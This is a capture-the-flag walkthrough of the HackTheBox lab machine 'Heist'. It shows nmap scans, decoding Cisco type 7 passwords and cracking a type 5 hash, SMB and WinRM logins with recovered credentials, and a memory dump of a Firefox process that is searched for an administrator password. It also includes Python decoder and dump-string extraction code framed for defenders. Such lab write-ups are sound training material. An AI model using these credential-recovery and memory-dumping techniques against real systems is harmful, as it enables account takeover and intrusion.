# Heist (Easy)

## Enumeration

### Nmap

```
nmap -sC -sV -oA nmap/10.10.10.149 10.10.10.149
```

```
Nmap scan report for 10.10.10.149
Host is up (0.11s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open  msrpc         Microsoft Windows RPC
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-09T16:24:17
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul  9 12:24:52 2021 -- 1 IP address (1 host up) scanned in 72.60 seconds
```

```
# Nmap 7.91 scan initiated Fri Jul  9 12:47:56 2021 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /home/kali/Boxes/Hackthebox/Hiest/results/10.10.10.149/scans/_full_tcp_nmap.txt -oX /home/kali/Boxes/Hackthebox/Hiest/results/10.10.10.149/scans/xml/_full_tcp_nmap.xml 10.10.10.149
Nmap scan report for 10.10.10.149
Host is up, received user-set (0.090s latency).
Scanned at 2021-07-09 12:47:57 EDT for 350s
Not shown: 65530 filtered ports
Reason: 65530 no-responses
PORT      STATE SERVICE       REASON  VERSION
80/tcp    open  http          syn-ack Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
445/tcp   open  microsoft-ds? syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 0s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 20087/tcp): CLEAN (Timeout)
|   Check 2 (port 48515/tcp): CLEAN (Timeout)
|   Check 3 (port 25486/udp): CLEAN (Timeout)
|   Check 4 (port 40753/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-09T16:53:10
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul  9 12:53:47 2021 -- 1 IP address (1 host up) scanned in 350.69 seconds
```

As usual, I start with port 80 and port 445.

### Port 80

![](/files/-Mg5Ns0b2YpmMhrd05Tf)

We can see a page like this, and we are able to log in as guest.

![](/files/-Mg5P-X9EtPX7ZC0LvqU)

When we click the attachment shown for user Hazard, we can see this:

![](/files/-Mg5PCMuWveUl2l4dds7)

Upon researching, we learn that Cisco type 7 passwords are reversible (they are encoded, not hashed), so they can be decoded directly.

We can use this [website](https://packetlife.net/toolbox/type7/) to decode them.

The type 5 password, on the other hand, is a real hash, so we use John the Ripper to crack it.

| Hash                               | Password          |
| ---------------------------------- | ----------------- |
| 02375012182C1A1D751618034F36415408 | Q4)sJu\Y8qz\*A3?d |
| 0242114B0E143F015F5D1E161713       | $uperP\@ssword    |
| $1$pdQG$o8nrSzsGXeaduXrjlvKc91     | stealth1agent     |
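As an added example, not part of the original writeup, here is the type 7 reversal that the website above performs, written in Python so the two type 7 values from the table can be checked offline, together with a small config auditor a defender can run over a saved IOS configuration to flag every type 5 and type 7 credential before it ends up in a support ticket. The fixed XOR key is the public one that type 7 uses; the sample config, its hostname and its usernames are constructed, while the three credential values are the ones from the table.

```python
import re

# Fixed XOR key of Cisco's type 7 "encryption". It is public, which is why
# type 7 is an encoding rather than a protection.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

# Matches "password 7 <hex>" / "secret 5 <hash>" fragments in an IOS config line.
SECRET_RE = re.compile(r"\b(?:password|secret)\s+(?P<type>[57])\s+(?P<value>\S+)")


def decode_type7(encoded: str) -> str:
    """Reverse a type 7 string: two decimal digits of seed, then XORed hex bytes."""
    encoded = encoded.strip()
    if (len(encoded) < 4 or len(encoded) % 2
            or not re.fullmatch(r"[0-9A-Fa-f]+", encoded)
            or not encoded[:2].isdigit()):
        raise ValueError("not a well-formed type 7 string")
    seed = int(encoded[:2], 10)            # starting offset into TYPE7_KEY
    body = bytes.fromhex(encoded[2:])
    plain = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)]
                  for i, b in enumerate(body))
    return plain.decode("ascii")


def audit_config(config: str) -> list:
    """Flag every type 5/7 credential in an IOS config; decode the type 7 ones.

    Type 5 ($1$...) is salted MD5-crypt: it cannot be reversed here, only
    cracked offline with a wordlist, so it is reported but not decoded.
    """
    findings = []
    for line_no, line in enumerate(config.splitlines(), start=1):
        m = SECRET_RE.search(line)
        if not m:
            continue
        kind = int(m.group("type"))
        value = m.group("value")
        if kind == 7:
            findings.append({"line": line_no, "type": 7, "value": value,
                             "plaintext": decode_type7(value),
                             "risk": "reversible encoding; rotate and migrate to type 8/9"})
        else:
            findings.append({"line": line_no, "type": 5, "value": value,
                             "plaintext": None,
                             "risk": "MD5-crypt; crackable offline with a wordlist"})
    return findings


# Constructed sample config: hostname and usernames are made up, the three
# credential values are the ones from the attachment in the writeup.
SAMPLE_CONFIG = """\
hostname core-rtr
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
"""

if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        shown = f["plaintext"] if f["plaintext"] is not None else f["value"]
        print(f"line {f['line']}: type {f['type']} -> {shown} ({f['risk']})")
```

The auditor deliberately does nothing clever with the type 5 entry: the point for a defender is that type 7 values leak the password to anyone who can read the config, while type 5 at least forces an offline guessing attack, which is exactly the split between "decode on a website" and "run John" that the writeup follows.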

After a lot of trial and error, we can finally log in to SMB with the correct pair of credentials.

```
smbclient --list //10.10.10.149/IPC$ -U hazard%stealth1agent
```

![](/files/-Mg5SI7Nf1XJ08MmznPy)

Then I use **impacket-lookupsid** to enumerate other possible users.

```
impacket-lookupsid hazard:stealth1agent@10.10.10.149
```

![](/files/-Mg5SeUasK9dBdXcoV9O)

We can see that there are users **Chase** and **Jason**.

From the full TCP nmap scan, we know that port 5985 is WinRM, which lets us log in to the system.

## User

We can use the user **Chase** with the password **Q4)sJu\Y8qz\*A3?d**.

```
evil-winrm -i 10.10.10.149 -u Chase -p "Q4)sJu\Y8qz*A3?d"
```

![](/files/-Mg5TKleRtZ6L-yW50yh)

Got the user flag!

![](/files/-Mg5U7WMnFiIr_o9kIwW)

## Privilege Escalation

After some enumeration, we can see that Mozilla Firefox is installed on the machine.

![](/files/-Mg5Uk4UeV2_QKTjjnVY)

From the `ps` command, we can see that there are a few Firefox processes running.

![](/files/-Mg5VZnH-4WrtzrD7K5b)

We can use [ProcDump64](https://api.256file.com/procdump64.exe/en-download-190118.html) to dump the full memory of one of these processes, then use [strings](https://ss64.com/nt/strings.html) to extract the readable text from the dump.

![](/files/-Mg5Xb8W-oNctGHm82u7)

```
./procdump64.exe -accepteula -ma 6728
```

![](/files/-Mg5YNlt5r4jlQ2_0qZv)

We can see that a dump file has been created.

Now we can use strings.exe to write the readable strings to a file.

```
./strings.exe -accepteula firefox.exe_210802_163838.dmp > readable.txt
```

After that, we can download the file containing the readable strings.

When I search the file for "password" in Sublime Text, it shows this:

![](/files/-Mg5ZTyAP-w8jJ_K1o0z)
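The procdump / strings / search steps above boil down to one technique: anything a process was given in clear text (a command-line argument, a form field, a URL) stays in its memory and is readable by anyone who can dump that process. As an added example, not part of the original writeup, the following Python does offline what strings.exe plus a text search does here, and additionally extracts UTF-16LE strings, which Windows processes are full of and which a plain ASCII `strings` misses. The `SAMPLE_DUMP` bytes are constructed (binary noise, a made-up command line with a placeholder password, and a UTF-16LE window title); they stand in for a real `.dmp` file.

```python
import re


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Return (offset, encoding, text) for every printable run of at least
    min_len characters, scanning both ASCII and UTF-16LE like Sysinternals
    strings.exe does by default."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = []
    for m in ascii_re.finditer(data):
        found.append((m.start(), "ascii", m.group().decode("ascii")))
    for m in utf16_re.finditer(data):
        found.append((m.start(), "utf-16le", m.group().decode("utf-16le")))
    return sorted(found)


def find_credential_hints(data: bytes,
                          keywords=("password", "passwd", "-p ")) -> list:
    """Filter the extracted strings for credential-related keywords, which is
    the manual 'search the dump for password' step done programmatically."""
    hits = []
    for off, enc, text in extract_strings(data):
        low = text.lower()
        if any(k in low for k in keywords):
            hits.append((off, enc, text))
    return hits


# Constructed stand-in for a slice of a process dump: 8 bytes of binary noise,
# an ASCII command line whose URL carries a placeholder password, a UTF-16LE
# BOM plus window title, and a little trailing noise.
SAMPLE_DUMP = (
    b"\x00\x01\x02MZ\x90\x00\x03"
    + b'"C:\\Program Files\\Mozilla Firefox\\firefox.exe" '
      b"localhost/login.php?login_username=admin@example.com"
      b"&login_password=EXAMPLE_pass123\x00"
    + b"\xff\xfe"
    + "Support Login Page".encode("utf-16le")
    + b"\x00\x00\x7f"
)

if __name__ == "__main__":
    for off, enc, text in extract_strings(SAMPLE_DUMP):
        print(f"{off:#08x} {enc:8s} {text}")
    print("credential hints:", find_credential_hints(SAMPLE_DUMP))
```

Run against a real dump, `find_credential_hints(open("firefox.exe_210802_163838.dmp", "rb").read())` gives the same kind of hit the Sublime search found. From the defender's side this is the check worth automating: if a credential shows up in the output for a process that should not hold it, the fix is to stop passing secrets on command lines and in URLs, not to hide the dump.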

Then we can log in as administrator using the password shown.

![](/files/-Mg5_Us6A2GS7mv-eNqv)

![](/files/-Mg5_d4WAj9DtdL6W9qu)

Congratz!

